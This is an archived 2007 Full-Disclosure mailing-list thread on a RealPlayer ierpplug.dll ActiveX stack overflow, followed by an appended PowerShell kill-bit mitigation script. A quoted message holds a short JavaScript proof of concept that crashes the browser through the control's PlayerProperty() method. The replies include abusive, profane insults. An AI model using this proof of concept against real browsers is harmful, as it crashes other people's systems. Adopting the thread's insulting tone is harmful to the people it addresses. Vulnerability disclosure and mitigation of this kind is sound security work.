Message-Id: <20071127160639.7BEB2DA820@mailserver8.hushmail.com>
Date: Tue, 27 Nov 2007 11:06:38 -0500
From: "Joey Mengele" <joey.mengele@...hmail.com>
To: <joey.mengele@...hmail.com>, <full-disclosure@...ts.grok.org.uk>,
<elazarb@...thlink.net>
Subject: Re: UPDATED: RealNetworks RealPlayer ierpplug.dll
ActiveX Control Multiple Stack Overflows
LOLOLOLOL ok you win, client side denial of service warrants your 5
electronic mail messages with up to the minute updates. I bet this
one will be exploited in the wild!
Get a life LOLOL!
J
On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad
<elazarb@...thlink.net> wrote:
>"Stack Overflow" - learn to read. A DoS attack still has some
>security implications...
>
>-----Original Message-----
>>From: Joey Mengele <joey.mengele@...hmail.com>
>>Sent: Nov 27, 2007 1:05 AM
>>To: full-disclosure@...ts.grok.org.uk, elazarb@...thlink.net
>>Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer
>>ierpplug.dll ActiveX Control Multiple Stack Overflows
>>
>>Holy mother of Hitler will you shut the fuck up already. This is a
>>"stack overflow" not a "stack based buffer overflow". There are no
>>security implications here. You are worse than Jewha Mati Laurio.
>>
>>Elazar, please do not post to this list again. Please leave the
>>trolling to the professionals.
>>
>>J
>>
>>P.S. Sorry for the swear words John.
>>
>>On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad
>><elazarb@...thlink.net> wrote:
>>>After some creative Googling, I am revising my original post. I
>>>believe that the Import() method overflow that I originally posted
>>>is really http://www.securityfocus.com/bid/26130, although I am
>>>not sure why Linux is listed under the "Vulnerable" section, so I
>>>am taking it out of the PoC code. Real claims to have patched this
>>>back in October, but I can still throw a stack overflow exception
>>>via this function using the originally stated version of
>>>RealPlayer (which I installed last night). I am now listing this
>>>vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX
>>>Control PlayerProperty() Method Stack Overflow, and it might be
>>>wise to list this under a separate BID. PoC as follows:
>>>
>>>-------------
>>><!--
>>>written by e.b.
>>>-->
>>><html>
>>> <head>
>>> <script language="JavaScript" DEFER>
>>> function Check() {
>>> var s = "AAAA";
>>>
>>> while (s.length < 999999) s=s+s;
>>>
>>> var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
>>>
>>> var obj2 = obj.PlayerProperty(s);
>>>
>>>
>>> }
>>> </script>
>>>
>>> </head>
>>> <body onload="JavaScript: return Check();">
>>>
>>> </body>
>>></html>
>>>-------------
>>>
>>>Elazar
>>>
>>>_______________________________________________
>>>Full-Disclosure - We believe in it.
>>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>Hosted and sponsored by Secunia - http://secunia.com/
>>
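A mitigation for the control discussed in this thread, added here as an example and not taken from any of the messages: setting the Internet Explorer kill bit for the CLSID quoted in the PoC comment, so the browser refuses to instantiate the control. The helper names are hypothetical, and the script assumes that CLSID is the control's and that it runs in an elevated PowerShell session.

```powershell
# CLSID exactly as quoted in the PoC comment earlier in this thread.
$Clsid   = '{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}'
$KillBit = 0x400   # bit in "Compatibility Flags" that makes IE refuse to load the control

# Native view plus the 32-bit view on 64-bit Windows; 32-bit IE reads the Wow6432Node copy.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-CompatFlags {            # hypothetical helper: current flags, 0 if unset
    param([string]$Key)
    if (-not (Test-Path -LiteralPath $Key)) { return 0 }
    $p = Get-ItemProperty -LiteralPath $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $p) { return 0 }
    return [int]$p.'Compatibility Flags'
}

function Set-KillBit {                # hypothetical helper: OR the kill bit into the flags
    param([string]$Key)
    if (-not (Test-Path -LiteralPath $Key)) { New-Item -Path $Key -Force | Out-Null }
    $flags = (Get-CompatFlags $Key) -bor $KillBit
    Set-ItemProperty -LiteralPath $Key -Name 'Compatibility Flags' -Value $flags -Type DWord
}

foreach ($root in $Roots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }   # view absent on this system
    $key = Join-Path $root $Clsid
    if (((Get-CompatFlags $key) -band $KillBit) -eq 0) {
        Set-KillBit $key              # needs an elevated session to write under HKLM
    }
    # Report the resulting flags for each view so the change can be audited.
    '{0} -> 0x{1:X}' -f $key, (Get-CompatFlags $key)
}
```

The kill bit only stops Internet Explorer from hosting the control; it does not remove or patch ierpplug.dll itself.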